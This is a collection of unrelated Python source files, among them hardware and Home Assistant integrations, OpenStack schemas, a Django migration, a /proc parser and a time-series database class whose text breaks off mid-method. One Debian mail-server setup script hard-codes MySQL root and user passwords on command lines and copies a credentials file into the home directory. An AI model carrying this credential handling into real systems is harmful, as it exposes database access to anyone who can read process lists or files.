    # noinspection PyMethodMayBeStatic
    def play_tone(self, command):
        """
        This will play a tone continuously at the specified frequency.
        To Turn off tone, set the frequency to 0.
        :param command: Command sent from Scratch/Snap!
        :return: HTTP response string
        """
        # Frequencies are for the 5th octave.
        # NOTE(review): "B": "958" looks like a typo — B5 is ~988 Hz;
        # confirm against the firmware/tone tables before changing.
        tone_chart = {"C": "523", "C_Sharp--D_Flat": "554", "D": "587", "D_Sharp--E_Flat": "622",
                      "E": "659", "F": "698", "F_Sharp--G_Flat": "740", "G": "783",
                      "G_Sharp--A_Flat": "831",
                      "A": "880", "A_Sharp--B_Flat": "932", "B": "958", "Note_Off": "0"}
        command_string = "T"
        command_string += tone_chart[command[1]]
        self.esplora.write(command_string)
        return 'okay'
    def continuous_tone(self, command):
        # Play a tone at a caller-supplied frequency (command[1] is the
        # frequency string); 0 turns the tone off.
        command_string = "T"
        command_string += command[1]
        self.esplora.write(command_string)
        return 'okay'
    # noinspection PyMethodMayBeStatic
    def tinker_output(self, command):
        """
        Output data to the tinkerKit A or B output channel
        :param command: Command sent from Scratch/Snap!
        :return: HTTP response string
        """
        # "Y" = channel A, "Z" = channel B in the serial protocol
        if command[1] == 'A':
            command_string = 'Y'
            command_string += command[2]
        else:
            command_string = 'Z'
            command_string += command[2]
        self.esplora.write(command_string)
        return 'okay'
    def get_snap_status(self, command):
        """
        This method allows status retrieval for the non-polling Snap! application
        :param command: Command sent from Scratch/Snap!
        :return: HTTP response string
        """
        if self.pop_status():
            if len(self.snap_report) != 0:
                # single-element commands (e.g. 'slider') key on the command
                # name itself; multi-element commands key on their argument
                if len(command) == 1:
                    report_entry = self.snap_report[command[0]]
                else:
                    report_entry = self.snap_report[command[1]]
                return report_entry
            else:
                return 'okay'
        else:
            return 'okay'
    # This table must be at the bottom of the file because Python does not provide forward referencing for
    # the methods defined above.
    # noinspection PyPep8
    command_dict = {'crossdomain.xml': send_cross_domain_policy, 'reset_all': reset_esplora,
                    'board_led': set_board_led, 'leds': set_leds, 'tinker_out': tinker_output,
                    'play_tone': play_tone, 'tone2': continuous_tone, 'orientation': orientation,
                    'temp_units': temp_units, 'poll': poll,
                    'buttons': get_snap_status, 'joystick': get_snap_status,
                    'accel': get_snap_status, 'slider': get_snap_status, 'light': get_snap_status,
                    'temp': get_snap_status, 'sound': get_snap_status, 'tkInput': get_snap_status
                    }
| MrYsLab/esp4s | esp4s_command_handlers.py | Python | gpl-3.0 | 10,277 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from tempest.lib.api_schema.response.compute.v2_51 import servers as servers251
# ****** Schemas changed in microversion 2.54 *****************
# Note(gmann): This is schema for microversion 2.54 which includes the
# 'key_name' in the Response body of the following APIs:
# - ``POST '/servers/{server_id}/action (rebuild)``
# Schema fragment for the 'key_name' field: a non-empty string or null.
key_name = {
    'oneOf': [
        {'type': 'string', 'minLength': 1, 'maxLength': 255},
        {'type': 'null'},
    ]
}
# Extend the 2.51 rebuild schemas: as of 2.54, 'key_name' is present and
# mandatory in the rebuild response body.
rebuild_server = copy.deepcopy(servers251.rebuild_server)
rebuild_server['response_body']['properties']['server'][
    'properties'].update({'key_name': key_name})
rebuild_server['response_body']['properties']['server'][
    'required'].append('key_name')
rebuild_server_with_admin_pass = copy.deepcopy(
    servers251.rebuild_server_with_admin_pass)
rebuild_server_with_admin_pass['response_body']['properties']['server'][
    'properties'].update({'key_name': key_name})
rebuild_server_with_admin_pass['response_body']['properties']['server'][
    'required'].append('key_name')
# NOTE(gmann): Below are the unchanged schema in this microversion. We need
# to keep this schema in this file to have the generic way to select the
# right schema based on self.schema_versions_info mapping in service client.
# ****** Schemas unchanged in microversion 2.54 since microversion 2.48 ***
get_server = copy.deepcopy(servers251.get_server)
list_servers_detail = copy.deepcopy(servers251.list_servers_detail)
update_server = copy.deepcopy(servers251.update_server)
list_servers = copy.deepcopy(servers251.list_servers)
show_server_diagnostics = copy.deepcopy(servers251.show_server_diagnostics)
get_remote_consoles = copy.deepcopy(servers251.get_remote_consoles)
list_tags = copy.deepcopy(servers251.list_tags)
update_all_tags = copy.deepcopy(servers251.update_all_tags)
delete_all_tags = copy.deepcopy(servers251.delete_all_tags)
check_tag_existence = copy.deepcopy(servers251.check_tag_existence)
update_tag = copy.deepcopy(servers251.update_tag)
delete_tag = copy.deepcopy(servers251.delete_tag)
attach_volume = copy.deepcopy(servers251.attach_volume)
show_volume_attachment = copy.deepcopy(servers251.show_volume_attachment)
list_volume_attachments = copy.deepcopy(servers251.list_volume_attachments)
show_instance_action = copy.deepcopy(servers251.show_instance_action)
create_backup = copy.deepcopy(servers251.create_backup)
| openstack/tempest | tempest/lib/api_schema/response/compute/v2_54/servers.py | Python | apache-2.0 | 2,965 |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """Auto-generated South migration: make Profile.converted_by nullable.

    NOTE: the 'models' dict below is South's frozen ORM snapshot at the
    time this migration was generated — do not hand-edit it.
    """
    def forwards(self, orm):
        # Changing field 'Profile.converted_by'
        # Forward: allow NULL for converted_by.
        db.alter_column(u'tango_in_blood_app_profile', 'converted_by_id', self.gf('django.db.models.fields.related.ForeignKey')(null=True, to=orm['auth.User']))
    def backwards(self, orm):
        # Changing field 'Profile.converted_by'
        # Backward: restore NOT NULL with a default of 0 for existing rows.
        db.alter_column(u'tango_in_blood_app_profile', 'converted_by_id', self.gf('django.db.models.fields.related.ForeignKey')(default=0, to=orm['auth.User']))
    models = {
        u'auth.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        u'auth.permission': {
            'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        u'tango_in_blood_app.profile': {
            'Meta': {'object_name': 'Profile'},
            'avatar': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
            'bio': ('django.db.models.fields.CharField', [], {'max_length': '6000', 'blank': 'True'}),
            'conversion_password': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40', 'blank': 'True'}),
            'converted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'profile_converted_bys'", 'null': 'True', 'to': u"orm['auth.User']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'profile_users'", 'to': u"orm['auth.User']"})
        }
    }
    complete_apps = ['tango_in_blood_app']
# -*- coding: utf-8 -*-
import click
import ndef
from ndeftool.cli import command_processor, dmsg
# NOTE: the docstring below is rendered verbatim by click as the command's
# help text ('\b' suppresses paragraph rewrapping), so it is user-visible
# output — do not reword it casually.
@click.command(short_help="Change the identifier of the last record.")
@click.argument('name')
@command_processor
def cmd(message, **kwargs):
    """The *identifier* command either changes the current last record's
    name (NDEF Record ID) or, if the current message does not have any
    records, creates a record with unknown record type and the given
    record name.
    \b
    Examples:
    ndeftool identifier 'record identifier' print
    ndeftool text 'first' id 'r1' text 'second' id 'r2' print
    """
    dmsg(__name__ + ' ' + str(kwargs))
    if not message:
        # no records yet: start one with the 'unknown' record type
        message = [ndef.Record('unknown')]
    try:
        # Record IDs are byte strings; latin-1 with 'replace' maps any
        # non-encodable character to '?' instead of raising.
        message[-1].name = kwargs['name'].encode('latin', 'replace')
    except ValueError as error:
        # e.g. the encoded name exceeds the NDEF ID length limit
        raise click.ClickException(str(error))
    return message
| nfcpy/ndeftool | src/ndeftool/commands/IDentifier.py | Python | isc | 902 |
"""Support for SimpliSafe freeze sensor."""
from simplipy.entity import EntityTypes
from homeassistant.const import DEVICE_CLASS_TEMPERATURE, TEMP_FAHRENHEIT
from homeassistant.core import callback
from . import SimpliSafeEntity
from .const import DATA_CLIENT, DOMAIN, LOGGER
async def async_setup_entry(hass, entry, async_add_entities):
    """Set up SimpliSafe freeze sensors based on a config entry."""
    simplisafe = hass.data[DOMAIN][DATA_CLIENT][entry.entry_id]
    entities = []
    for system in simplisafe.systems.values():
        # V2 systems are not supported for sensor setup; log and move on.
        if system.version == 2:
            LOGGER.info("Skipping sensor setup for V2 system: %s", system.system_id)
            continue
        # Only temperature-type sensors become freeze sensor entities.
        entities.extend(
            SimplisafeFreezeSensor(simplisafe, system, sensor)
            for sensor in system.sensors.values()
            if sensor.type == EntityTypes.temperature
        )
    async_add_entities(entities)
class SimplisafeFreezeSensor(SimpliSafeEntity):
    """Define a SimpliSafe freeze sensor entity."""
    def __init__(self, simplisafe, system, sensor):
        """Initialize."""
        super().__init__(simplisafe, system, sensor.name, serial=sensor.serial)
        # underlying simplipy sensor object; source of temperature readings
        self._sensor = sensor
        # last temperature reading, populated by async_update_from_rest_api
        self._state = None
        self._device_info["identifiers"] = {(DOMAIN, sensor.serial)}
        self._device_info["model"] = "Freeze Sensor"
        self._device_info["name"] = sensor.name
    @property
    def device_class(self):
        """Return type of sensor."""
        return DEVICE_CLASS_TEMPERATURE
    @property
    def unique_id(self):
        """Return unique ID of sensor."""
        # the hardware serial is globally unique per sensor
        return self._sensor.serial
    @property
    def unit_of_measurement(self):
        """Return the unit of measurement."""
        # SimpliSafe reports temperature in Fahrenheit
        return TEMP_FAHRENHEIT
    @property
    def state(self):
        """Return the sensor state."""
        return self._state
    @callback
    def async_update_from_rest_api(self):
        """Update the entity with the provided REST API data."""
        self._state = self._sensor.temperature
| balloob/home-assistant | homeassistant/components/simplisafe/sensor.py | Python | apache-2.0 | 2,020 |
__author__ = 'Jody Shumaker'  # package author metadata
| jshumaker/LoA | utility/__init__.py | Python | mit | 29 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Provision a Debian mail-server host: hostname, MySQL and the vmail database.

Side effects only; every step shells out. The credentials (root/fbs,
vmail/fbs) are hard-coded for this workshop setup on purpose.
"""
import os, subprocess
import sys, traceback
import crypt


def _preseed(selection):
    # The original fed debconf-set-selections via the bash-only "<<<"
    # here-string, but os.system() runs /bin/sh (dash on Debian), where
    # that syntax silently fails. Feed the selection through stdin instead.
    subprocess.run(["debconf-set-selections"], input=selection + "\n", text=True)


print("Kopiere: .my.cnf kann das Passwort und Benutzername von MySQL-Nutzern hinterlegt werden. Achtung: Sicherheitsrisiko!")
cmd1 = os.system("cp my.cnf ~/.my.cnf")
# Update/upgrade the OS and give the host the fixed name "mail".
print("Update und Upgrade des Betriebssystems")
print("Namen 'mail' für den Server festlegen")
cmd1 = os.system("echo 'mail' > /etc/hostname")
datei = open("/etc/hosts", "a")
datei.write("127.0.0.1 mail.mysystems.tld mail localhost.localdomain localhost\n")
datei.write("::1 mail.mysystems.tld mail localhost.localdomain ip6-localhost\n")
datei.close()
print("Hostname für E-Mail-Server setzen")
cmd1 = os.system("echo $(hostname -f) > /etc/mailname")
cmd1 = os.system("apt-get update -qq && sudo apt-get upgrade -y -qq")
print(" Passwort und Benutzer für mysql festlegen: fbs/bs")
# Preseed the MySQL root password so the install below runs unattended.
_preseed("mysql-server mysql-server/root_password password fbs")
_preseed("mysql-server mysql-server/root_password_again password fbs")
print(" Datenbank installieren")
cmd1 = os.system("apt install mysql-server -y")
print(" Datenbank vmail anlegen.")
cmd1 = os.system("mysql -u root -pfbs -e 'create database vmail;'")
print("Benutzer vmail anlegen.")
cmd1 = os.system("mysql -u root -pfbs -e 'GRANT ALL ON vmail.* TO 'vmail'@'localhost' IDENTIFIED BY 'fbs';'")
print("Tabellen anlegen")
# Was: mysql 'vmail' < 'mysql' — unlike every other call this passed no
# credentials and fails once root has a password. Import the schema file
# named "mysql" into the vmail database with the same root login.
cmd1 = os.system("mysql -u root -pfbs vmail < mysql")
| joergre/workshops | LF7/EMail/1Stunde.py | Python | cc0-1.0 | 1,487 |
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The devices file.
"""
class Devices:
    """Parsed snapshot of /proc/devices.

    Maps major device numbers to driver names, split into the
    character-device and block-device sections of the file.
    """

    def __init__(self):
        self._charmap = {}
        self._blockmap = {}
        # Default section until a header line is seen. /proc/devices starts
        # with "Character devices:", but don't rely on it (avoids an
        # unbound `curmap` if a data line ever comes first).
        curmap = self._charmap
        # FIX: the file object was opened and never closed; a context
        # manager releases the handle even if parsing raises.
        with open("/proc/devices") as fo:
            for line in fo:
                if line.startswith("Character"):
                    curmap = self._charmap
                elif line.startswith("Block"):
                    curmap = self._blockmap
                elif len(line) > 4:
                    # Data lines look like "  1 mem": major number, name.
                    [num, fmt] = line.split()
                    curmap[int(num)] = fmt

    def __str__(self):
        s = ["Character devices:"]
        for num, fmt in self._charmap.items():
            s.append("%3d %s" % (num, fmt))
        s.append("\nBlock devices:")
        for num, fmt in self._blockmap.items():
            s.append("%3d %s" % (num, fmt))
        return "\n".join(s)

    def get_device(self, dtype, major, minor):
        # TODO: unimplemented stub in the original; kept for API compatibility.
        pass
def _test(argv):
    # Smoke test: parse /proc/devices and dump both sections.
    # (Python 2 print statement — this module targets python2.7.)
    d = Devices()
    print d
if __name__ == "__main__":
    import sys
    _test(sys.argv)
| kdart/pycopia | core/pycopia/OS/Linux/proc/devices.py | Python | apache-2.0 | 1,668 |
from collections import defaultdict, OrderedDict
from operator import and_
from functools import reduce
import operator
import numpy as np
import gc
import uuid
from scipy.interpolate import interp1d
import sys
sys.path.insert(0, '../')
from timeseries import TimeSeries
import os
import procs
from procs.isax import isax_indb
import random
from .trees import BinarySearchTree, Tree_Initializer
# Comparison-operator tokens (as they appear in select() metadata queries)
# mapped to the corresponding predicates from the operator module.
OPMAP = dict(
    [
        ("==", operator.eq),
        ("!=", operator.ne),
        ("<", operator.lt),
        ("<=", operator.le),
        (">", operator.gt),
        (">=", operator.ge),
    ]
)
class PersistentDB:
    """Database implementation with a local dictionary, which saves all necessary data to files for later use"""

    def __init__(self, schema, pkfield, load=False, dbname="db", overwrite=False, dist=procs.corr_indb, threshold=10, wordlength=16, tslen=256, cardinality=64):
        """
        Parameters
        ----------
        schema : dict
            Key = name of field (e.g. 'ts', 'mean')
            Value = dict of that field's properties. Recognized keys include:
                'type': Required for all fields except ts. pkfield must have type str.
                'index': Required for all fields.
        pkfield : str
            The name of the field which will be the primary key. Must match a key in schema.
        load : bool
            Whether to populate the database with an existing one on file.
        dbname : str
            Database filename
        overwrite : bool
            If load=False, whether to overwrite an existing database.
        dist : function
            Calculates the distance between two TimeSeries objects, must take arguments (ts1, ts2)

        Attributes
        ----------
        indexes : dict
            Key = fieldname
            Value = binary search tree (if int or float) or dictionary of sets (otherwise) mapping values to pks
        rows : dict
            Key = primary key
            Value = dict of the fields associated with each key
        schema : dict (See above)
        pkfield : str (See above)
        dbname : str (See above)
        tslen : int
            The length of each timeseries in the database, strictly enforced
        """
        # ---- Validating input ---- #
        if not isinstance(pkfield, str):
            raise ValueError("Field name must be of type str")
        if not isinstance(threshold, int):
            raise ValueError("Threshold must be of type int")
        if not isinstance(wordlength, int):
            raise ValueError("Word length must be of type int")
        if threshold <= 0:
            raise ValueError("Threshold must be greater than zero")
        if wordlength <= 0:
            raise ValueError("Word length must be greater than zero")
        # A power of two has exactly one '1' bit, i.e. none after the leading bit.
        if '1' in '{0:b}'.format(wordlength)[1:]:
            raise ValueError("Word length must be a power of two")
        if not isinstance(tslen, int):
            raise ValueError("TimeSeries length must be of type int")
        if tslen < wordlength:
            raise ValueError("TimeSeries length must be greater than or equal to the word length")
        if '1' in '{0:b}'.format(tslen)[1:]:
            raise ValueError("TimeSeries length must be a power of two")
        if not isinstance(cardinality, int):
            raise ValueError("Cardinality must be of type int")
        if cardinality <= 0:
            raise ValueError("Cardinality must be greater than zero")
        if '1' in '{0:b}'.format(cardinality)[1:]:
            raise ValueError("Cardinality must be a power of two")
        if cardinality > 64:
            raise ValueError("Cardinalities greater than 64 are not supported")
        if not isinstance(load, bool):
            raise ValueError("Load must be of type bool")
        if not isinstance(dbname, str):
            raise ValueError("Database name must be string")
        if not isinstance(overwrite, bool):
            raise ValueError("Overwrite must be of type bool")
        if isinstance(schema, dict):
            for field in schema:
                if field == 'DELETE':
                    raise ValueError("The fieldname 'DELETE' is forbidden")
                if ':' in field:
                    raise ValueError("Field names may not contain the ':' character")
                if field != 'ts':
                    if 'type' not in schema[field]:
                        raise ValueError("Schema must specify type for each non-ts field")
                    if field == pkfield and schema[field]['type'] != str:
                        raise ValueError("Primary key must be of type str")
                    if schema[field]['type'] not in [int, float, bool, str]:
                        raise ValueError("Only types int, float, bool, and str are supported")
                    if field[:5] == 'd_vp-':
                        raise ValueError("Field names beginning with 'd_vp-' are forbidden")
                    if field == 'vp' and schema[field]['type'] != bool:
                        raise ValueError("Field 'vp' must be of boolean type")
        else:
            raise ValueError("Schema must be a dictionary")
        if pkfield not in schema:
            raise ValueError("Primary key field must be included in schema")
        # Assign attributes according to schema
        self.indexes = {}
        self.rows = {}
        self.rows_SAX = {}
        self.wordlength = wordlength
        self.threshold = threshold
        self.SAX_tree = Tree_Initializer(threshold=threshold, wordlength=wordlength).tree
        self.card = cardinality
        self.schema = schema
        self.dbname = dbname
        self.pkfield = pkfield
        self.tslen = None
        self.tslen_SAX = tslen
        self.overwrite = overwrite
        self.dist = dist
        self.vps = []
        for s in schema:
            indexinfo = schema[s]['index']
            if indexinfo is not None:
                # Numeric fields get an order-aware index; everything else a hash index.
                if schema[s]['type'] == int or schema[s]['type'] == float:
                    self.indexes[s] = BinarySearchTree()
                else:  # Add a bitmask option for strings?
                    self.indexes[s] = defaultdict(set)
        if load:
            try:
                # Replay the append-only log; later records supersede earlier ones.
                with open(dbname) as fd:
                    for l in fd.readlines():
                        [pk, field, val] = l.strip().split(":")
                        if field in self.schema:
                            # The first record logged for a pk is always
                            # pk:pkfield:pk, so creating the row dict here also
                            # captures that first field's value.
                            if pk not in self.rows:
                                self.rows[pk] = {pkfield: pk}
                            else:
                                if self.schema[field]['type'] == bool:
                                    self.rows[pk][field] = (val != 'False')
                                else:
                                    self.rows[pk][field] = self.schema[field]['type'](val)
                            if pk not in self.rows_SAX:
                                self.rows_SAX[pk] = {pkfield: pk}
                            else:
                                if self.schema[field]['type'] == bool:
                                    self.rows_SAX[pk][field] = (val != 'False')
                                else:
                                    self.rows_SAX[pk][field] = self.schema[field]['type'](val)
                            if field == 'vp' and val == 'True':
                                self.vps.append(pk)
                                self.indexes['d_vp-'+pk] = BinarySearchTree()
                        elif field == 'DELETE':
                            if 'vp' in schema and self.rows[pk]['vp'] == True:
                                self.del_vp(pk)
                            del self.rows[pk]
                            del self.rows_SAX[pk]
                        elif field[:5] == 'd_vp-':
                            self.rows[pk][field] = float(val)
                        else:
                            raise IOError("Database is incompatible with input schema")
                # Read in timeseries of non-deleted keys
                for pk in self.rows:
                    tsarray = np.load(self.dbname+"_ts/"+pk+"_ts.npy")
                    self.rows[pk]['ts'] = TimeSeries(tsarray[0, :], tsarray[1, :])
                    self.tslen = tsarray.shape[1]
                    # Resample onto a uniform grid of tslen_SAX points for iSAX.
                    x1 = np.linspace(min(tsarray[0, :]), max(tsarray[0, :]), self.tslen_SAX)
                    ts_SAX_data = interp1d(tsarray[0, :], tsarray[1, :])(x1)
                    ts_SAX = TimeSeries(x1, ts_SAX_data)
                    self.rows_SAX[pk]['ts'] = ts_SAX
                    rep = isax_indb(ts_SAX, self.card, self.wordlength)
                    self.SAX_tree.insert(pk, rep)
                self.index_bulk(list(self.rows.keys()))
            except Exception as err:
                # Was a bare `except:`; chain the cause so corruption is debuggable.
                raise IOError("Database does not exist or has been corrupted") from err
        else:
            if os.path.exists(dbname) and overwrite == False:
                raise ValueError("Database of that name already exists. Delete existing db, rename, or set overwrite=True.")

    def insert_ts(self, pk, ts):
        """Insert the TimeSeries `ts` under primary key `pk` and index it."""
        try:
            pk = str(pk)
        except Exception:
            raise ValueError("Primary keys must be string-compatible")
        if ':' in pk:
            raise ValueError("Primary keys may not include the ':' character")
        if not isinstance(ts, TimeSeries):
            raise ValueError('Must insert a TimeSeries object')
        # FIX: validate the length BEFORE mutating self.rows, so a failed
        # insert no longer leaves a half-created, ts-less row behind.
        if self.tslen is None:
            self.tslen = len(ts)
        elif len(ts) != self.tslen:
            raise ValueError('All timeseries must be of same length')
        if pk in self.rows or pk in self.rows_SAX:
            raise ValueError('Duplicate primary key found during insert')
        self.rows[pk] = {self.pkfield: pk}
        self.rows_SAX[pk] = {self.pkfield: pk}
        # Save timeseries as a 2d numpy array
        if not os.path.exists(self.dbname+"_ts"):
            os.makedirs(self.dbname+"_ts")
        np.save(self.dbname+"_ts/"+pk+"_ts.npy", np.vstack((ts.time, ts.data)))
        # Uniformly resampled copy used for iSAX indexing
        x1 = np.linspace(min(ts.time), max(ts.time), self.tslen_SAX)
        ts_SAX = TimeSeries(x1, interp1d(ts.time, ts.data)(x1))
        if not os.path.exists(self.dbname+"_ts_SAX"):
            os.makedirs(self.dbname+"_ts_SAX")
        np.save(self.dbname+"_ts_SAX/"+pk+"_ts_SAX.npy", np.vstack((ts_SAX.time, ts_SAX.data)))
        # Append a record to the log; the first write (or an explicit
        # overwrite request) truncates the file.
        if self.overwrite or not os.path.exists(self.dbname):
            mode = 'w'
            self.overwrite = False
        else:
            mode = 'a'
        with open(self.dbname, mode) as fd:
            fd.write(pk+':'+self.pkfield+':'+pk+'\n')
            if 'vp' in self.schema:
                fd.write(pk+':vp:False\n')
        self.rows[pk]['ts'] = ts
        self.rows_SAX[pk]['ts'] = ts_SAX
        if 'vp' in self.schema:
            self.rows[pk]['vp'] = False
            self.rows_SAX[pk]['vp'] = False
        rep = isax_indb(ts_SAX, self.card, self.wordlength)
        self.SAX_tree.insert(pk, rep)
        # Record the distance to every existing vantage point.
        for vp in self.vps:
            ts1 = self.rows[vp]['ts']
            self.upsert_meta(pk, {'d_vp-'+vp: self.dist(ts1, ts)})
        self.update_indices(pk)

    def del_vp(self, vp):
        """ Removes the d_vp-vp field from all rows """
        for pk in self.rows:
            if pk != vp:
                del self.rows[pk]['d_vp-'+vp]
        self.vps.remove(vp)
        del self.indexes['d_vp-'+vp]

    def delete_ts(self, pk):
        """Delete `pk` from the rows, the indexes, the iSAX tree, and log it."""
        if pk in self.rows:
            for field in self.rows[pk]:
                if field[:5] == 'd_vp-':
                    # Distance fields always live in a BST index (skip self-distance).
                    if field[5:] != pk:
                        self.indexes[field].delete(self.rows[pk][field], pk)
                elif self.schema[field]['index'] is not None:
                    if self.schema[field]['type'] in [int, float]:
                        self.indexes[field].delete(self.rows[pk][field], pk)
                    else:
                        self.indexes[field][self.rows[pk][field]].remove(pk)
                    if field == 'vp' and self.rows[pk]['vp'] == True:
                        self.del_vp(pk)
            del self.rows[pk]
            with open(self.dbname, 'a') as fd:
                fd.write(pk+':DELETE:0\n')
        if pk in self.rows_SAX:
            rep = isax_indb(self.rows_SAX[pk]['ts'], self.card, self.wordlength)
            self.SAX_tree.delete(rep, pk)
            del self.rows_SAX[pk]

    def upsert_meta(self, pk, meta):
        """Insert or update metadata fields for `pk` and refresh the indexes."""
        if isinstance(meta, dict) == False:
            raise ValueError('Metadata should be in the form of a dictionary')
        if pk not in self.rows:
            raise ValueError('Timeseries should be added prior to metadata')
        oldrow = self.rows[pk].copy()
        for field in meta:
            if field in self.schema:
                try:
                    convertedval = self.schema[field]['type'](meta[field])
                    if self.schema[field]['type'] == str and ':' in convertedval:
                        raise ValueError("Strings may not include the ':' character")
                    # FIX: store the converted value so the in-memory type always
                    # matches the schema (the raw input used to be stored, which
                    # could diverge from what a reload would produce).
                    self.rows[pk][field] = convertedval
                except Exception:
                    raise ValueError("Value not compatible with type specified in schema")
            elif field[:5] == 'd_vp-':
                self.rows[pk][field] = float(meta[field])
            else:
                raise ValueError('Field not supported by schema')
        with open(self.dbname, 'a') as fd:
            for field in meta:
                # Log the value as stored, so a reload reproduces memory exactly.
                fd.write(pk+':'+field+':'+str(self.rows[pk][field])+'\n')
        self.update_indices(pk, oldrow)

    def add_vp(self, pk=None):
        """
        Adds pk as a vantage point

        Parameters
        ----------
        pk : str or None
            The primary key of the timeseries which is to be added as a vantage point.
            If None, method will choose a random entry in the database.
        """
        # ---- Validating input ---- #
        if 'vp' not in self.schema:
            raise ValueError("Vantage points not supported by schema, must include 'vp' field")
        if pk is None:
            # FIX: random.shuffle(list(pkrand)) shuffled a throwaway copy, so
            # the "random" choice was always the first key in dict order.
            pkrand = list(self.rows.keys())
            random.shuffle(pkrand)
            foundvp = False
            for k in pkrand:
                if self.rows[k]['vp'] == False:
                    pk = k
                    foundvp = True
                    break
            if foundvp == False:
                raise ValueError("No more primary keys available as vantage points")
        elif pk not in self.rows:
            raise ValueError("Primary key not in database")
        elif self.rows[pk]['vp']:
            raise ValueError("This timeseries is already a vantage point")
        self.vps.append(pk)
        self.upsert_meta(pk, {'vp': True})
        self.indexes['d_vp-'+pk] = BinarySearchTree()
        # Record the distance from the new vantage point to every row.
        ts1 = self.rows[pk]['ts']
        for key in self.rows:
            ts2 = self.rows[key]['ts']
            self.upsert_meta(key, {'d_vp-'+pk: self.dist(ts1, ts2)})

    def simsearch_SAX(self, ts):
        """Approximate nearest-neighbor search via the iSAX tree.

        Returns the primary key of the closest candidate in the matched tree
        node (falling back to the broader `search2` lookup when that node has
        no entries), or None when no candidate exists.
        """
        if isinstance(ts, TimeSeries):
            ts = [ts.time, ts.data]
        # Resample the query onto the same uniform grid used at insert time.
        x1 = np.linspace(min(ts[0]), max(ts[0]), self.tslen_SAX)
        ts_SAX = TimeSeries(x1, interp1d(ts[0], ts[1])(x1))
        rep = isax_indb(ts_SAX, self.card, self.wordlength)
        n = self.SAX_tree.search(rep)
        candidates = n.ts if n.ts else self.SAX_tree.search2(rep).ts
        closestpk = None
        pkdist = None
        for pk in candidates:
            thisdist = self.dist(ts_SAX, self.rows_SAX[pk]['ts'])
            if pkdist is None or thisdist < pkdist:
                closestpk = pk
                pkdist = thisdist
        return closestpk

    def simsearch(self, ts):
        """ Search over all timeseries in the database and return the primary key
        of the object which is closest """
        if not isinstance(ts, TimeSeries):
            raise ValueError("Input must be a TimeSeries object")
        if len(self.vps) == 0:
            raise ValueError("Database must contain vantage points before simsearch can be called")
        # Find closest vantage point
        closestvp = None
        vpdist = None
        for vp in self.vps:
            thisdist = self.dist(ts, self.rows[vp]['ts'])
            if vpdist is None or thisdist < vpdist:
                closestvp = vp
                vpdist = thisdist
        # Select all timeseries within 2*vpdist from closestvp (triangle inequality).
        closepks, _ = self.select(meta={'d_vp-'+closestvp: {'<=': 2*vpdist}}, fields=None)
        # Find closest timeseries among the candidates.
        closestpk = None
        pkdist = None
        for pk in closepks:
